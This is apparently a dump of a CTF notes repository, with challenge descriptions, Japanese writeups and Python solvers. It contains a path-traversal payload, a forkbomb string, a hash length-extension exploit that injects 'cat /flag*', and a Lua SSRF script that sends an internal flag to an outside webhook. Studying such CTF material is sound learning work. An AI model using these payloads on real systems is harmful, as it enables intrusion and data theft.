mean?\n\n[Bad_Apple.mp4](https://dctf.dragonsec.si/files/230afaac6d3b52b608268829e8aa11d0/Bad_Apple.mp4?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTU5fQ.YJ_N4w.0vJLfjRs9ynSQLFDyDpwv51oJQA)\n" }, { "alpha_fraction": 0.6516854166984558, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 14, "blob_id": "8085c08a7c799cae9434d4b1ca9ca719a2464a70", "content_id": "7106136ade66f66fb4c0d53c4134431f6a140af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/2020/HITCON_CTF_2020/Welcome/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's a reverse challenge.\n\n`ssh [email protected]`\npassword: hitconctf\n\nAuthor: hitcon" }, { "alpha_fraction": 0.7268518805503845, "alphanum_fraction": 0.7384259104728699, "avg_line_length": 32.30769348144531, "blob_id": "8a5a2861f9b39bf91594a1534b765903651218a6", "content_id": "a26f0a63ab4a053b5709153179a9016a0711f4c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 786, "license_type": "no_license", "max_line_length": 95, "num_lines": 13, "path": "/2020/WaniCTF/Simple_Memo/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`https://simple.wanictf.org/index.php?file=test.txt`のように`file`パラメータの先にファイルパスを指定して表示する仕組みになっている。\n\nディレクトリトラバーサルであるというヒントがあるので、相対パス指定の`../`を使いたいところだが、そのままではサニタイズされているので工夫が必要。\n\n`../`を` `(空白)に置換するので、`....//`を与えれば、結果は`../`となる。\n\nよって、`https://simple.wanictf.org/index.php?file=....//flag.txt`とすればよい。\n\n`index.php`と同じディレクトリに置かれているので、`https://simple.wanictf.org/flag.txt`にアクセスしてもフラグが得られる。\n\n<!-- FLAG{y0u_c4n_get_hi5_5ecret_fi1e} -->" }, { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 25.047618865966797, "blob_id": "2014ce5d2335b5ab41a23b9a0326f6ca24f42e32", "content_id": "ffad866c5a88b5675e7b87033f21107e95177f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 850, "license_type": "no_license", "max_line_length": 181, "num_lines": 21, "path": "/2020/pbctf_2020/Not-stego/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nPNGファイルが与えられる。問題タイトルが Not-stego なので、steganography ではないと信じる。\n\n画像を表示すると、アセンブリ言語が書かれている。\n\n![](./profile.png)\n\n命令を見ても何か意味があるように思えない(いきなり`dec`で始まったり、謎のアドレスに`jump`したり)ので、データ部分を文字列に変換してみる。\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=NDg2NTcyNjUyNzczMjA2ZDc5MjA2YzY5NmU2YjNhMjA2ODc0NzQ3MDczM2EyZjJmNzA2MTczNzQ2NTYyNjk2ZTJlNjM2ZjZkMmY2YTM2NTg2NDM5NDc0ZTRkMjAyMDNjMmQyZDIwNDg2NTY4NjU2ODY1Njg2NTIxMjA1MzY1NjUyMDY5NjYyMDc5NmY3NTIwNjM2MTZlMjA1MjQ1MjA2ZDY1)\n\nすると、以下のメッセージが現れた。\n\n```\nHere's my link: https://pastebin.com/j6Xd9GNM <-- Hehehehe! See if you can RE me\n```\n\nリンク先を見るとフラグが書かれている。\n\n<!-- pbctf{3nc0d1ng_w1th_ass3mbly} -->" }, { "alpha_fraction": 0.8271604776382446, "alphanum_fraction": 0.8395061492919922, "avg_line_length": 15.399999618530273, "blob_id": "55ce5526704b04d6e814f8dcfe57b211c5ebea7e", "content_id": "234f1025999a845e849c5d0528c2cc1a207b9d0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 145, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/2020/WaniCTF/DevTools_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ブラウザの開発者ツールを使ってソースコードをのぞいてみましょう!\n\nhttps://devtools1.wanictf.org\n\nWriter : suuhito" }, { "alpha_fraction": 0.5624468922615051, "alphanum_fraction": 0.5994052886962891, "avg_line_length": 23.52083396911621, "blob_id": "81ee778f2cd47a80ab4761ef77e13e95b2908019", "content_id": "b43064e29d31991a9a15dee9ce4e0baa3ce9da3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2498, "license_type": "no_license", "max_line_length": 193, "num_lines": 96, "path": "/2021/ImaginaryCTF_2021/Imaginary/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\n\nimport random\nfrom solve import solve\n\nbanner = '''\nWelcome to the Imaginary challenge! I'm gonna give you 300 imaginary/complex number problems, and your job is to solve them all. Good luck!\n\nSample input: (55+42i) + (12+5i) - (124+15i)\nSample output: -57+32i\n\nSample input: (23+32i) + (3+500i) - (11+44i)\nSample output: 15+488i\n\n(NOTE: DO NOT USE eval() ON THE CHALLENGE OUTPUT. TREAT THIS IS UNTRUSTED INPUT. Every once in a while the challenge will attempt to forkbomb your system if you are using eval(), so watch out!)\n'''\n\nflag = open(\"flag.txt\", \"r\").read()\nops = ['+', '-']\n\nprint(banner)\n\nfor i in range(300):\n\to = random.randint(0,50)\n\tif o > 0:\n\t\tnums = []\n\t\tchosen_ops = []\n\t\tfor n in range(random.randint(2, i+2)):\n\t\t\tnums.append([random.randint(0,50), random.randint(0,50)])\n\t\t\tchosen_ops.append(random.choice(ops))\n\t\tout = \"\"\n\t\tfor op, num in zip(chosen_ops, nums):\n\t\t\tout += f\"({num[0]}+{num[1]}i) {op} \"\n\t\tout = out[:-3]\n\t\tprint(out)\n\t\tans = input(\"> \")\n\t\tif ans.strip() == solve(out).strip():\n\t\t\tprint(\"Correct!\")\n\t\telse:\n\t\t\tprint(\"That's incorrect. :(\")\n\t\t\texit()\n\telse:\n\t\tn = random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n\t\tpayload = f\"__import__['os'].system('{n}(){{ {n}|{n} & }};{{{n}}}')\"\n\t\tprint(payload)\n\t\tinput(\"> \")\n\t\tprint(\"Correct!\")\n\nprint(\"You did it! Here's your flag!\")\nprint(flag)\n```\n\n与えられた計算式に対して、300回計算に成功すればフラグが得られそうなので、プログラムを書く。\n\n```py\nfrom pwn import *\nimport re\nfrom tqdm import tqdm\n\nio = remote('chal.imaginaryctf.org', '42015')\n\nio.recvuntil('so watch out!)\\n\\n')\n\nfor _ in tqdm(range(300)):\n out = io.recvline().decode('utf-8')\n nums = list(re.findall(r'\\(([0-9i+-]+)\\)', out))\n opts = list(re.findall(r'\\) ([+-]) \\(', out))\n opts = ['+'] + opts # first number is positive\n real, image = 0, 0\n for idx, num in enumerate(nums):\n num = list(map(int, list(re.findall(r'\\d+', num))))\n if opts[idx] == '+':\n real += num[0]\n image += num[1]\n else:\n real -= num[0]\n image -= num[1]\n if image >= 0:\n io.sendline(f'{real}+{image}i')\n else:\n io.sendline(f'{real}{image}i')\n if b'Correct!' not in io.recvline():\n break\n\nio.interactive()\nio.close()\n```\n\n最後にフラグが出力された。\n\n<!-- ictf{n1c3_y0u_c4n_4dd_4nd_subtr4ct!_49fd21bc} -->\n" }, { "alpha_fraction": 0.8372092843055725, "alphanum_fraction": 0.8552971482276917, "avg_line_length": 34.181819915771484, "blob_id": "95f42318a30aca70e7c8012a2edbd46479e11d59", "content_id": "a65d16053ba8f15026b271e36dc25a37ca7506e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 657, "license_type": "no_license", "max_line_length": 129, "num_lines": 11, "path": "/2021/WaniCTF21-spring/CloudFront_Basic_Auth/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "API Gateway, Lambda, S3, CloudFront, CloudFormationを使ってアプリを作ってみました。\n\n重要なエンドポイントにはBasic認証をつけてみました。\n\nhttps://cf-basic.web.wanictf.org/\n\nヒント: 上のURLにアクセスするとexceptionと同じ見た目のWebアプリが表示されますが、添付されているzipファイルにはexceptionの添付ファイルから新しいファイルが追加されています。添付ファイルを参考にもう一つのFLAGを発見してください!\n\n[web-cf-basic.zip](https://score.wanictf.org/storage/xq6t17wy5cijqtu4dpscrcfbxjk0sewk/web-cf-basic.zip)\n\nWriter : suuhito\n" }, { "alpha_fraction": 0.5029354095458984, "alphanum_fraction": 0.5283757448196411, "avg_line_length": 27.38888931274414, "blob_id": "9bf43feaefed6d49f222c54ca712405fca2a1b34", "content_id": "51e8b2a292c33d35c5d53d684fbe5f5a8a2bd1cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 54, "num_lines": 18, "path": "/2021/angstromCTF_2021/Follow_the_Currents/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nimport zlib\ndef keystream(key):\n index = 0\n while 1:\n index+=1\n if index >= len(key):\n key += zlib.crc32(key).to_bytes(4,'big')\n yield key[index]\nwith open(os.path.dirname(__file__)+\"/enc\",\"rb\") as f:\n cipher = f.read()\n for n in range(256*256):\n plaintext = []\n k = keystream(n.to_bytes(2,'big'))\n for i in cipher:\n plaintext.append(i ^ next(k))\n if b'actf{' in bytes(plaintext) :\n print(bytes(plaintext))\n" }, { "alpha_fraction": 0.5040650367736816, "alphanum_fraction": 0.6991869807243347, "avg_line_length": 16.571428298950195, "blob_id": "591180fb02951b9139fbd7c383fc04202bd32b98", "content_id": "64800fe9949a908f292bfcdc896ec54c978fd40d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 187, "license_type": "no_license", "max_line_length": 43, "num_lines": 7, "path": "/2021/Zh3r0_CTF_V2/A_Small_Maniacs_game/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nアセンブリ言語を用いたゲームを全部クリアするとフラグが得られる。\n\n![](img/2021-06-05-22-38-14.png)\n\n<!-- zh3r0{s0m3t1m3s_4SM_c4N_g1b_bUrn5} -->\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.8133333325386047, "avg_line_length": 44.20000076293945, "blob_id": "03153c9eb8390b757656a363cf6a8483a96c45ae", "content_id": "c03e6b21bf2aef16e6df37863e8be8bce434ff58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 225, "license_type": "no_license", "max_line_length": 106, "num_lines": 5, "path": "/2020/pbctf_2020/Not-stego/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hallmark of a good CTF is inclusion of Steganography. You asked and we delivered, or didn't we?\n\nBy: theKidofArcrania\n\n[profile.png](https://storage.googleapis.com/pbctf-2020-ctfd/5c4ee97d61acd03c77cda40f72647e49/profile.png)" }, { "alpha_fraction": 0.5270729064941406, "alphanum_fraction": 0.5488511323928833, "avg_line_length": 22.069124221801758, "blob_id": "0b87b3da3bd05d3c4ea961390eae124b4c9a79a8", "content_id": "60366ccbf4598eb32a608b9cca6d4fa9c0af7202", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5415, "license_type": "no_license", "max_line_length": 94, "num_lines": 217, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os, secrets, string, time\nfrom flag import flag\n\n\ndef main():\n # It's a tiny server...\n blob = bytearray(2**16)\n files = {}\n used = 0\n\n # Use deduplication to save space.\n def store(data):\n nonlocal used\n MINIMUM_BLOCK = 16\n MAXIMUM_BLOCK = 1024\n part_list = []\n while data:\n prefix = data[:MINIMUM_BLOCK]\n ind = -1\n bestlen, bestind = 0, -1\n while True:\n ind = blob.find(prefix, ind+1)\n if ind == -1: break\n length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))\n if length > bestlen:\n bestlen, bestind = length, ind\n\n if bestind != -1:\n part, data = data[:bestlen], data[bestlen:]\n part_list.append((bestind, bestlen))\n else:\n part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]\n blob[used:used+len(part)] = part\n part_list.append((used, len(part)))\n used += len(part)\n assert used <= len(blob)\n\n fid = \"\".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))\n files[fid] = part_list\n return fid\n\n def load(fid):\n data = []\n for ind, length in files[fid]:\n data.append(blob[ind:ind+length])\n return b\"\".join(data)\n\n print(\"Welcome to our file storage solution.\")\n\n # Store the flag as one of the files.\n store(bytes(flag, \"utf-8\"))\n\n while True:\n print()\n print(\"Menu:\")\n print(\"- load\")\n print(\"- store\")\n print(\"- status\")\n print(\"- exit\")\n choice = input().strip().lower()\n if choice == \"load\":\n print(\"Send me the file id...\")\n fid = input().strip()\n data = load(fid)\n print(data.decode())\n elif choice == \"store\":\n print(\"Send me a line of data...\")\n data = input().strip()\n fid = store(bytes(data, \"utf-8\"))\n print(\"Stored! Here's your file id:\")\n print(fid)\n elif choice == \"status\":\n print(\"User: ctfplayer\")\n print(\"Time: %s\" % time.asctime())\n kb = used / 1024.0\n kb_all = len(blob) / 1024.0\n print(\"Quota: %0.3fkB/%0.3fkB\" % (kb, kb_all))\n print(\"Files: %d\" % len(files))\n elif choice == \"exit\":\n break\n else:\n print(\"Nope.\")\n break\n\ntry:\n main()\nexcept Exception:\n print(\"Nope.\")\ntime.sleep(1)\n```\n\n---\n\n[動作の概要]\n\n* `load`\n\n`fid`を入力すると、`files`に登録されている`index`を元に`blob`からデータを取り出す。\n\n```\n例)\n\nfiles = {'hoge':(2,5)}\nblob = b'12345678'\n\nfid = 'hoge'\ndata = b'34567'\n```\n\n* `status`\n\n`blob`内のデータサイズ`used`が分かる。\n\n* `store`\n\n`blob`にデータを格納し、`fid`を返す。\n\n* `exit`\n\nプログラムを終了する。\n\n---\n\n`store`を使ってデータを格納するとき、データを16バイトで区切り、同じ文字列があれば同じ`index`を`files`に記憶していることが分かった。\n\n```\n例)\n\nfiles = {'hoge':(2,5)}\nblob = b'12345678'\n\nfid = 'hoge'\ndata = b'34567'\n\n# store 123\nfiles = {'hoge':(2,5), 'fuga':(0,3)}\n```\n\nつまり、既に`store`されている文字列と同じ文字列を`store`すると、`blob`内のデータサイズ`used`が増えない。\n\nよって、`used`が増えないような文字列を見つければよい。\n\n```py\nfrom pwn import *\ncontext.log_level = 'error'\n\nimport re\nimport string\n\nSTRING = string.digits + string.ascii_letters + string.punctuation\n\nio = remote('filestore.2021.ctfcompetition.com', '1337')\nio.recvuntil('exit\\n')\n\ndef store(data):\n io.sendline('store')\n io.sendline(data)\n io.recvuntil('exit\\n')\n\ndef status():\n io.sendline('status')\n storage = re.search(r'(\\d\\.\\d+)kB/', io.recvuntil('Menu').decode('utf-8')).group(1)\n io.recvuntil('exit\\n')\n return float(storage)\n\npattern = '0134cdfinptuCFMPRT_{}'\n## searching used char in the flag \n# pattern = ''\n# for s in STRING:\n# current = status()\n# store(s)\n# after = status()\n# if current == after:\n# pattern += s\n\nflag = 'CTF'\nwhile True:\n tmp = flag[-1]\n while True:\n for p in pattern:\n current = status()\n store(tmp + p)\n after = status()\n if current == after:\n tmp += p\n print(tmp)\n break\n if len(flag) % 16 == 0 or p == '}':\n break\n flag += tmp[1:]\n if flag[-1] == '}':\n break\nprint(flag)\n\nio.close()\n```\n\n<!-- CTF{CR1M3_0f_d3dup1ic4ti0n} -->" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.7872340679168701, "avg_line_length": 15, "blob_id": "6376ce8a41ddcf94ce0ba917ab8885e90e387c1f", "content_id": "c9d9953f7a89a51d8d5c32325f83d78917c66a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Raise the Flag\n\nhttps://ctftime.org/team/137917" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 17, "blob_id": "ec0e61fd5cef0889f1d055ecb823b4acdfce1ff3", "content_id": "bb4f4c2f7f235a5c4fec9c8e6f7a94aded781fbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "no_license", "max_line_length": 52, "num_lines": 13, "path": "/2021/BCACTF_2.0/Zstegosaurus/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n画像ファイルが与えられる。\n\n`zsteg`を使って調べたところ、文字列が隠されていた。\n\n```\n$ zsteg zstegosaurus.png\nb1,r,lsb,xy .. text: \"h15_n@m3_i5nt_g3rard\"\nb4,rgb,msb,xy .. text: [\"w\" repeated 10 times]\n```\n\n<!-- bcactf{h15_n@m3_i5nt_g3rard} -->\n" }, { "alpha_fraction": 0.5988200306892395, "alphanum_fraction": 0.8643068075180054, "avg_line_length": 66.80000305175781, "blob_id": "33bc7b4c21a8dcccf3842c9736d5087f78e694b9", "content_id": "8fe37ad182945ee1a5815cb06d08763fe2f02484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 339, "license_type": "no_license", "max_line_length": 203, "num_lines": 5, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We stored our flag on this platform, but forgot to save the id. Can you help us restore it?\n\n[Attachment](https://storage.googleapis.com/gctf-2021-attachments-project/6e5c4cbba595ef1c9d22bfd958dc9144b863081d359a4c27a366c5b8d48b99a26d9b5c4c4bb56db7890b6f188a1ae1b4371d568a22a12e4386d3c0f91dc6c29b)\n\n`filestore.2021.ctfcompetition.com 1337`\n" }, { "alpha_fraction": 0.6306474208831787, "alphanum_fraction": 0.6707032918930054, "avg_line_length": 34.79999923706055, "blob_id": "5c95fd8a1c2e55da64e953f1127f12552c5b49a3", "content_id": "4c0599e4d85468feed2bbed71e601b761c9e7b39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2147, "license_type": "no_license", "max_line_length": 143, "num_lines": 60, "path": "/2020/hxp_CTF_2020/nanothorpe/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original : https://github.com/TalaatHarb/ctf-writeups/blob/main/hxpctf2020/nanothorpe/exploit.py\nimport requests\nimport base64\n\nfrom urllib.parse import parse_qsl, unquote_to_bytes, urlencode\nfrom struct import pack, unpack\n\nfrom nanothorpe.octothorpe import octothorpe\n\ndef parse(query_string):\n return dict(parse_qsl(query_string, errors='ignore')), unquote_to_bytes(query_string)\n\n# base_url = 'http://157.90.22.14:8832/'\nbase_url = 'http://localhost:8832/'\n\nheaders = {\\\n 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\\\n 'Referer' : base_url,\\\n 'Accept' : '*/*',\\\n 'Connection' : 'keep-alive',\\\n 'Accept-Language' : 'en-US,en;q=0.9'\\\n}\n\nparams1 = {\\\n 'cmd' : 'ls'\\\n}\n\nsecret_length = 32 # got it by trail and error\nr1 = requests.get(base_url + 'api/authorize', headers=headers, params=params1, allow_redirects=False)\nsignature = r1.cookies.get('signature')\npath_url = r1.next.path_url\nargs, decoded = parse(path_url[path_url.index('?')+1:])\nexpiry = r1.next.path_url[path_url.index('=')+1:path_url.index('&')]\n\n# Actual exploit here : manuiplating the signature to allow another command\nactual_length = secret_length + len(decoded)\npadding = b'\\x80' + b'\\x00' * ((octothorpe.block_size - 9 - actual_length) % octothorpe.block_size) + (8 * actual_length).to_bytes(8, 'little')\nb = b'&cmd=cat+/flag*'\nn = actual_length + len(padding)\nha = signature\nhb = octothorpe(b, _length=n, _state=bytearray.fromhex(ha)).hexdigest()\n\nold_cmd = {'expiry':expiry,'cmd': (b'ls' + padding)}\nnew_cmd = {'cmd':(b'cat /flag*')}\n\nold_enc = urlencode(old_cmd)\nnew_enc = urlencode(new_cmd)\n\nparameters = (old_enc + '&' + new_enc) # parameters = {'expiry':expiry,'cmd':'old_cmd+padding','cmd':'new_cmd'}\n\ncookies2 = {\\\n 'signature' : hb\\\n}\n\n# End of trickery\nr2 = requests.get(base_url + 'api/run?' + parameters, headers=headers, cookies=cookies2, allow_redirects=False)\nstatus_code = r2.status_code\n\nif status_code != 403 and status_code != 503:\n print(base64.b64decode(r2.json()['stdout']).decode('utf-8').rstrip(), sep='')" }, { "alpha_fraction": 0.6439024209976196, "alphanum_fraction": 0.8487805128097534, "avg_line_length": 40.20000076293945, "blob_id": "7d0e389457c10571b0445960e5227082b8cbd5aa", "content_id": "6202bc58c5f2398123df721c6885b2f77b8e8436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 131, "num_lines": 5, "path": "/2021/DiceCTF_2021/babymix/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Just the right mix of characters will lead you to the flag :)\n\nDownloads\n\n[babymix](https://dicegang.storage.googleapis.com/uploads/3821fb32cc49474f2431d2c27e3c696c856e57dcd719d5c0bd3739435afc755a/babymix)" }, { "alpha_fraction": 0.643750011920929, "alphanum_fraction": 0.762499988079071, "avg_line_length": 25.66666603088379, "blob_id": "29cc9621419ab7cb1c241cd2da9c49e2b6283ed7", "content_id": "235713bd6a5bd076293c0d2e086af63a76dde264", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 160, "license_type": "no_license", "max_line_length": 98, "num_lines": 6, "path": "/2021/HeroCTF_v3/Ping_Pong/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Could you get the flag ?\n\nFormat : Hero{}\nAuthor : xanhacks\n\n[output.txt](https://www.heroctf.fr/files/9d840ae120320372481f4b7cbfd7beeb/output.txt?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIzfQ.YIQj7g.zFG502UF7YnpS_Q19ej_cmChX3I)\n" }, { "alpha_fraction": 0.7635135054588318, "alphanum_fraction": 0.7635135054588318, "avg_line_length": 20.14285659790039, "blob_id": "7c83c15ad38d8c7e48b353a5c151192b8178bce9", "content_id": "e315876ed579dc78c6ca97cddb3743c99ae643ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 148, "license_type": "no_license", "max_line_length": 70, "num_lines": 7, "path": "/2021/HeroCTF_v3/We_need_you_2_5/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It must be their team name.\n\nFor this second step, find the user's name and password in clear text.\n\nAuthor: Worty\n\nFormat: Hero{Username:Password}\n" }, { "alpha_fraction": 0.7309644818305969, "alphanum_fraction": 0.7664974331855774, "avg_line_length": 27.285715103149414, "blob_id": "f37443420cbc75fd067e77c080319fb3baaaa479", "content_id": "383472e21be9a490ad18362b91c25a045a922041", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 197, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Check out my super safe website! Enter the password to get the flag\n\nhttp://web.bcactf.com:49157/\n\nHint 1 of 1\n\nHow does the Web Assembly check the password you entered, and what is it looking for?" }, { "alpha_fraction": 0.6097561120986938, "alphanum_fraction": 0.8130081295967102, "avg_line_length": 40.33333206176758, "blob_id": "e7d66b9861239595b1b0e3cf982182a6c2758876", "content_id": "112e79b94c4ddecd25e947e8f583dd5cd76293d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 115, "num_lines": 3, "path": "/2021/RITSEC_CTF_2021/BIRDTHIEF_FYSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "~knif3\n\n[BIRDTHIEF_FYSA.pdf](https://ctf.ritsec.club/files/da6836558110e083f9777504def7b588/BIRDTHIEF_FYSA.pdf?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6OX0.YHGfhA.fKjChdB8Es9vcccju1Rz8U4rfwo)" }, { "alpha_fraction": 0.6356877088546753, "alphanum_fraction": 0.6956319808959961, "avg_line_length": 20.96938705444336, "blob_id": "87f84161c9118c1552194fcc560184e22bc7a70c", "content_id": "d25ecb994e964eb489ebeba856cab360ba6eff9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2906, "license_type": "no_license", "max_line_length": 130, "num_lines": 98, "path": "/2020/pbctf_2020/Sploosh/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\nリンク先にアクセスすると以下のような画面が表示される。\n\n![](img/2020-12-05-16-46-54.png)\n\n適当にURLを入力し、Submitすると謎の数字が出力される。\n\n![](img/2020-12-05-16-47-50.png)\n\nまた、このページでソースコードをダウンロードできる。[[source code](dist.zip)]\n\nユーザーが値をSubmitしたとき、サーバーサイドでの動作は次のようになる。\n\n`index.php`\n\n* `api.php?url=`を呼び出す\n\n`api.php`\n\n* `file_get_contents(\"http://splash:8050/render.json?timeout=1&url=\" . urlencode($url))`を実行する\n\n* 実行結果をJSON形式で返す\n\n * `{\"geometry\":[0,0,1024,768]}`\n\n`index.php`\n\n* `api.php`の戻り値を表示する\n\n脆弱性がありそうなのは`api.php`で、ここで`flag.php`を呼び出すことができれば良さそう。\n \n| input | output |\n| ------------- | ------------ |\n| ` ` | undefined |\n| `php://input` | null |\n| `flag` | 0,0,1024,768 |\n\n`file_get_contents`では`scrapinghub/splash`の`render.json`にアクセスしている。\n\nそのため、PHPの実行結果を`geometry`キーの値に設定できないか、Splashのドキュメントを読んで調べる。\n\n* https://splash.readthedocs.io/en/stable/api.html\n\n# Solution\n\n**[writeup]**\n\n* https://ctftime.org/writeup/25207\n\n`Splash`でLuaスクリプトを実行する。\n\n* [Splash Scripts Tutorial](https://splash.readthedocs.io/en/stable/scripting-tutorial.html#scripting-tutorial)\n\n実行するスクリプトは以下の通り。\n\n```lua\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. treat.as_string(json.body))\nend \n```\n\nこれを`execute?lua_source=`に渡せばよい。\n\n実行結果はWebhookで受け取る。今回は https://webhook.site/ を使う。\n\n```py\nimport requests\nfrom urllib.parse import quote\n\nlua=\"\"\"\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. treat.as_string(json.body))\nend \n\"\"\"\n \nurl='http://sploosh.chal.perfect.blue/api.php?url=http://splash:8050/execute?lua_source='+quote(lua)\nresponse=requests.get(url)\nprint(response.text)\n```\n\n上記コードを実行すると、Webhookに対するリクエストを見ることができる。\n\n![](img/2020-12-07-20-24-41.png)\n\n<!-- pbctf{1_h0p3_y0u_us3d_lua_f0r_th1s} -->\n\n## Comment\n\nWebhookを使った問題が初めてだった。\n\nまた、APIドキュメントを読んでLuaスクリプトが実行できることはわかっていたが、パラメータの渡し方がわかっていなかった。" }, { "alpha_fraction": 0.6820027232170105, "alphanum_fraction": 0.7449255585670471, "avg_line_length": 24.05084800720215, "blob_id": "ab23bee1a131943d71234058973a10cfdc635c9f", "content_id": "01901066edc6b08c75cb567b54f84bf5aa9921b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2094, "license_type": "no_license", "max_line_length": 152, "num_lines": 59, "path": "/2020/SquareCTF2020/Oh_Sheet/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Solved ?\n\n# Try\n\n[リンク](https://docs.google.com/spreadsheets/d/15PFb_fd6xKVIJCF0b0XiiNeilFb-L4jm2uErip1woOM/edit#gid=0)先はGoogle SpreadSheetで、以下のような内容が記載されている。\n\n```\nMake a copy of this sheets, by going to File->Make a copy\t\t\n\t\t\nNote that the key consists of lowercase letters, and has no repeated letters. It is 9 characters long. Order of characters matters!\t\t\nKey:\tabcdefg\t\n\t\t\t\t\nCiphertext\tՑÜÑàσëÞåØäÑëÜÇÞÔå\t\nPlaintext\ts/vi{cŠ|‚pe„{c{l€\t\n🚩 = 